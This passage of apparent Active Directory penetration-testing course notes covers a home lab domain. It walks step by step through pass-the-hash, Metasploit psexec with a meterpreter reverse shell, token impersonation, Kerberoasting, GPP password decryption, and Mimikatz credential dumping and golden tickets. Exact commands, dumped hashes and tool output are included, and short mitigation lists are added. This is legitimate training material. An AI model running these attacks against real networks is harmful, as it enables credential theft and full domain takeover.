MARVEL\DEADPOOL$:aad3b435b51404eeaad3b435b51404ee:e386804db4c1f9282660d52e219fba2c::: [*] DPAPI_SYSTEM dpapi_machinekey:0x12cb07363cb99661330a2cfb448d60c1c98b88b5 dpapi_userkey:0x57bcac926451a5712a17718ec8c321ee7702a82e [*] NL$KM 0000 E0 F1 A9 C6 F9 1B 9F 19 1B 5D B3 21 8A C2 4D 2E .........].!..M. 0010 10 8E 00 95 72 90 28 97 9B 87 A9 96 2E C3 78 BA ....r.(.......x. 0020 62 F1 EE 40 C5 52 8A D2 5C ED 4C 2F D5 89 5C DD b..@.R..\.L/..\. 0030 60 48 E9 6B D3 83 EB A6 6B 41 5C 78 48 AC 2D 9A `H.k....kA\xH.-. NL $KM:e0f1a9c6f91b9f191b5db3218ac24d2e108e0095729028979b87a9962ec378ba62f1ee40c5528ad25ced4c2fd5895cd [*] Cleaning up... [*] Stopping service RemoteRegistry [*] Restoring the disabled state for service RemoteRegistry Passing the Hash Passing the hash If we crack a password and / or can dump the SAM hashes, we can leverage both for lateral movement in networks. 24/33 We could crack the hashes and obtain passwords or just pass the hashes. IMPORTANT: you can pass NTLM hashes but NOT NTLMv2 Hashes Attack Scenarios 1) As per the previous attack with secretsdump.py we were able to extract some hashes. These hashes were saved in file: samhashes.txt Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Frank Castle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: Dead Pool:1002:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0::: 2 ) Cracking the hashes with Hashcat: hashcat -m 1000 sam-hashes.txt /usr/share/wordlists/rockyou.txt └──╼ $hashcat -m 1000 sam-hashes.txt /usr/share/wordlists/rockyou.txt --show 31d6cfe0d16ae931b73c59d7e0c089c0: 64f12cddaa88057e06a81b54e73b949b:Password1 c39f2beb3d2ec06a62cb887fb391dee0:Password2 So we have the password for Frank Castle and Dead Pool users. 3 ) Let's try to pass the hash. We copy the 2nd half and use crackmapexec to pass it: *** notice that we use "-d ." instead of the domain. This means to try for local accounts. └──╼ $crackmapexec smb 192.168.2.0/24 -u 'Frank Castle' -d . -H 64f12cddaa88057e06a81b54e73b949b SMB 192.168.2.201 445 THEPUNISHER [*] Windows (name:THEPUNISHER) (domain:.) (signing:False) (SMBv1:False) SMB 192.168.2.202 445 DEADPOOL [*] Windows (name:DEADPOOL) (domain:.) (signing:False) (SMBv1:False) SMB 192.168.2.200 445 HYDRA-DC [*] Windows DC) (domain:.) (signing:True) (SMBv1:False) SMB 192.168.2.201 445 THEPUNISHER [+] .\Frank 64f12cddaa88057e06a81b54e73b949b SMB 192.168.2.200 445 HYDRA-DC [-] .\Frank 64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE SMB 192.168.2.202 445 DEADPOOL [-] .\Frank 64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE 10.0 Build 18362 10.0 Build 18362 10.0 Build 17763 (name:HYDRACastle Castle Castle This time it is not showing “pwned” but we can see a PLUS sign which means he was able to log there. Let's try with user “Dead Pool” SMB 192.168.2.200 445 HYDRA-DC [*] Windows 10.0 Build 17763 (name:HYDRADC) (domain:.) (signing:True) (SMBv1:False) SMB 192.168.2.201 445 THEPUNISHER [*] Windows 10.0 Build 18362 (name:THEPUNISHER) (domain:.) (signing:False) (SMBv1:False) SMB 192.168.2.200 445 HYDRA-DC [-] .\Dead Pool c39f2beb3d2ec06a62cb887fb391dee0 STATUS_LOGON_FAILURE SMB 192.168.2.201 445 THEPUNISHER [-] .\Dead Pool c39f2beb3d2ec06a62cb887fb391dee0 STATUS_LOGON_FAILURE SMB 192.168.2.202 445 DEADPOOL [*] Windows 10.0 Build 18362 (name:DEADPOOL) (domain:.) (signing:False) (SMBv1:False) SMB 192.168.2.202 445 DEADPOOL [+] .\Dead Pool c39f2beb3d2ec06a62cb887fb391dee0 Same good results with 'Dead Pool' user. 25/33 Something to note: - fcastle is an admin in both THEPUNISHER and DEADPOOL PC - Frank Castle is just a local user in THEPUNISHER PC - DEAD POOL is just a local user in DEADPOOL PC Another thing. If we get a SAM Hash for an Admin this could be something great since sometimes these users are setup in EVERY machine before joining them to the domain. 4 ) We can also use PSEXEC WITH A HASH. Instead of using a password: sudo psexec.py 'Frank Castle':@192.168.2.201 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b for this one we need to use both hashes. the LM and NTLM. └──╼ $sudo psexec.py 'Frank Castle':@192.168.2.201 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] [-] [-] [*] [*] [*] [-] [-] Requesting shares on 192.168.2.201..... share 'ADMIN$' is not writable. share 'C$' is not writable. Found writable share Share Uploading file NIkMVshl.exe Opening SVCManager on 192.168.2.201..... Error opening SVCManager on 192.168.2.201..... Error performing the installation, cleaning up: Unable to open SVCManager In this case it doesn't work since “Frank Castle” doesn't have a writable share to access. Mitigation Strategies Pass Attack Mitigations This is hard to completely prevent, but we can make it more difficult on an attacker: • Limit account Reuse. ◇ Avoid re-using local admin password ◇ Disable Guest and Administrator Accounts ◇ Limit who is a local administrator (least privilege) • Utilize Strong Passwords: ◇ Passwords longer than 14 characters are better ◇ Avoid using common words ◇ Prefer to use long sentences • Privilege Access Management (PAM) ◇ Check out/in sensitive accounts when needed ◇ Automatically rotate passwords on check out and check in ◇ Limit pass attacks as hash/passwords is strong and constantly rotated Token Impersonation 26/33 What are tokens? • Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers. There are two types: • Delegate - Created for logging into a machine or using Remote Desktop • Impersonate - “Non-Interactive” such as attaching a network drive or a domain logon script. Token Impersonation Attack with Metasploit 1) Metasploit with psexec for example: msf6 exploit(windows/smb/psexec) > options Module options (exploit/windows/smb/psexec): Name Current Setting Required ------------------ -------RHOSTS 192.168.2.201 yes or hosts file with syntax 'file:<path>' RPORT 445 yes SERVICE_DESCRIPTION no target for pretty listing SERVICE_DISPLAY_NAME no SERVICE_NAME no SHARE C$ no share (ADMIN$,C$,...) or a normal read/write folder SMBDomain MARVEL.local no authentication SMBPass Password1 no SMBUser fcastle no Description ----------The target host(s), range CIDR identifier, The SMB service port (TCP) Service description to to be used on The service display name The service name The share to connect to, can be an admin share The Windows domain to use for The password for the specified username The username to authenticate as Payload options (windows/x64/meterpreter/reverse_tcp): Name ---EXITFUNC none) LHOST LPORT Current Setting --------------thread Required -------yes Description ----------Exit technique (Accepted: '', seh, thread, process, 192.168.2.51 4444 yes yes The listen address (an interface may be specified) The listen port Exploit target: Id -2 Name ---Native upload msf6 exploit(windows/smb/psexec) > sessions -i 4 [*] Starting interaction with 4... meterpreter > load incognito eterpreter > list_tokens -u 27/33 Delegation Tokens Available ======================================== Font Driver Host\UMFD-0 Font Driver Host\UMFD-1 Font Driver Host\UMFD-2 MARVEL\Administrator MARVEL\fcastle NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Window Manager\DWM-1 Window Manager\DWM-2 Impersonation Tokens Available ======================================== No tokens available meterpreter > impersonate_token marvel\\administrator [+] Delegation token available [+] Successfully impersonated user MARVEL\Administrator meterpreter > shell Process 10476 created. Channel 1 created. Microsoft Windows [Version 10.0.18363.418] (c) 2019 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami marvel\administrator C:\Windows\system32> And here we are impersonating another logged in user: administrator. Use rev2self to return to the original user Mitigation Token Impersonation Mitigation • Limit user/group Token creation permissions • Account Tiering • Local Admin Restriction Kerberoasting Kerberoasting Kerberoasting is a pervasive attack technique targeting Active Directory service account credentials. Advanced and lesser-skilled attackers alike favor Kerberoasting because the technique can be carried out by any user on a domain—not just administrators. It is also an “offline” attack that doesn't require any packets be sent to the targeted service—traffic that would be logged and quite possibly trigger alerts. Kerberoasting, instead, takes advantage of human nature nearly as much as it exploits known security weaknesses in Kerberos 28/33 authentication for Active Directory. At its core, Kerberoasting is a password cracking attack in which credentials are stolen from memory and cracked offline. Goal: Get TGS and decrypt server's account hash. Key Points • Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. • Kerberoasting is a common, pervasive attack that exploits a combination of weak encryption and poor service account password hygiene. • Kerberoasting is effective because an attacker does not require domain administrator credentials to pull off this attack and can extract service account credential hashes without sending packets to the target. Good resource: https://medium.com/@Shorty420/kerberoasting-9108477279cc/ Attack 1) We get the hash: └──╼ $sudo ntpdate 192.168.2.200 ## this is to synchronize the time with the DC 26 Oct 02:49:16 ntpdate[16043]: adjust time server 192.168.2.200 offset +0.000120 sec └──╼ $sudo GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 192.168.2.200 -request /usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in a future release. from cryptography import x509 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------------------------- -------------------------------------------------------------------- ---------------------------------- ---------HYDRA-DC/SQLService.MARVEL.local:60111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=MARVEL,DC=local 2020-10-20 23:20:55.096410 <never> $krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111* $7812aa624ec7a647d8f5320457d94628 $30e4c7f2f551d167eaeecc1aa6addd84db7ca56e35d84301530d35ed835546e3b4d88c07840bccea22bb0c7bfadc18d78f 2 ) We crack the hash: └──╼ $hashcat --help | grep Kerberos 7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth 13100 | Kerberos 5, etype 23, TGS-REP 18200 | Kerberos 5, etype 23, AS-REP 19600 | Kerberos 5, etype 17, TGS-REP 19700 | Kerberos 5, etype 18, TGS-REP 19800 | Kerberos 5, etype 17, Pre-Auth 19900 | Kerberos 5, etype 18, Pre-Auth ┌─[marduk@periquito]─[~/temp/UDEMY] | | | | | | | Network Network Network Network Network Network Network └──╼ $hashcat -m 13100 kerberos-hash.txt /usr/share/wordlists/rockyou.txt --force 29/33 Protocols Protocols Protocols Protocols Protocols Protocols Protocols $krb5tgs$23$*SQLService$MARVEL.LOCAL$HYDRA-DC/SQLService.MARVEL.local~60111* $7812aa624ec7a647d8f5320457d94628 $30e4c7f2f551d167eaeecc1aa6addd84db7ca56e35d84301530d35ed835546e3b4d88c07840bccea22bb0c7bfadc18d78f Password is Mypassword123# Kerberoasting Mitigation Kerberoasting Mitigation • Strong Passwords • Least Privilege Group Policy Preferences Attacks Group Policy Preferences (GPP) Attacks AKA MS14-025 • • • • GPP allowed admins to create policies using embedded credentials These credentials were encrypted and placed in a “cPassword” They Key was accidentally released (whoops) Patched in MS14-025, but doesn't prevent previous uses. Resources: https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ Attack Vectors a) gpp-decrypt easily decrypts cpasswords. b) There's a tool in metasploit that works once we have a session in it (smb_enum_gpp) we just background the session and run this module. Good practice is box “ACTIVE” in HTB. Mimikatz Mimikatz • Tool used to view and steal credentials, generate kerberos tickets, leverate attacks. • Dump Credentials stored in memory • Just a few attacks: Credential Dumping, Pass-The-Hash, Over-Pass-The-Hash, Pass-The-Ticket, Golden Ticket, Silver Ticket. Invoke-Mimikatz is another alternative since most AV will pickup mimikatz. Obfuscation is another alternative to do this. Credential Dumping with Mimikatz 1 ) We load mimikatz and the rest of the files in the victim machine and start mimikatz.exe (or invoke-mimikatz for PS): 30/33 2 ) run “privilege::debug” it should say privilege ‘20’ ok. Then let's attempt to dump information from memory by doing sekurlsa::logonpasswords and this should show a huge dump of stuff: For example here. We have the NTLM hash for the administrator so we could PASS THE HASH with it: Some other commands we can try (get ntlm hashes): lsadump::sam 31/33 lsadump::sam /patch lsadump::lsa /patch Golden Ticket Attacks Golden Ticket Attack and Pass the Ticket Attack When we have a golden ticket we have complete access to the entire domain. Attack: 1) We do the same first step with mimikatz.exe: privilege::debug 2) We run the following command: lsadump::lsa /inject /name:krbtgt *** a lot of information is going to dump. So this is a good time to add all the info into a notepad. 3 ) We need the SID of the domain. We need the NTLM hash of the Kerberos TGT. With this we can generate the golden ticket. 4) type: kerberos::golden /User:Administratorfakeuser /domain:marvel.local /sid: S-1-5-21-942791118-1442518653-2818883610 / krbtgt:f656d85ce0d4c124e78fae6766c691de /id:500 /ptt id of 500 is the admin account of 500. With this ticket we can access any computer we want. 5 ) We can do something like misc::cmd . This will open a new command prompt and from here we could do whatever we want on any computer connected to the domain: Then we can run whatever we want on any computer we want: dir \\DEADPOOL\C$ would show the contents of C drive etc. 32/33 33/33

Domain Controller and Active Directory Tools.ctb

Add this document to collection(s)

Add this document to saved

Suggest us how to improve StudyLib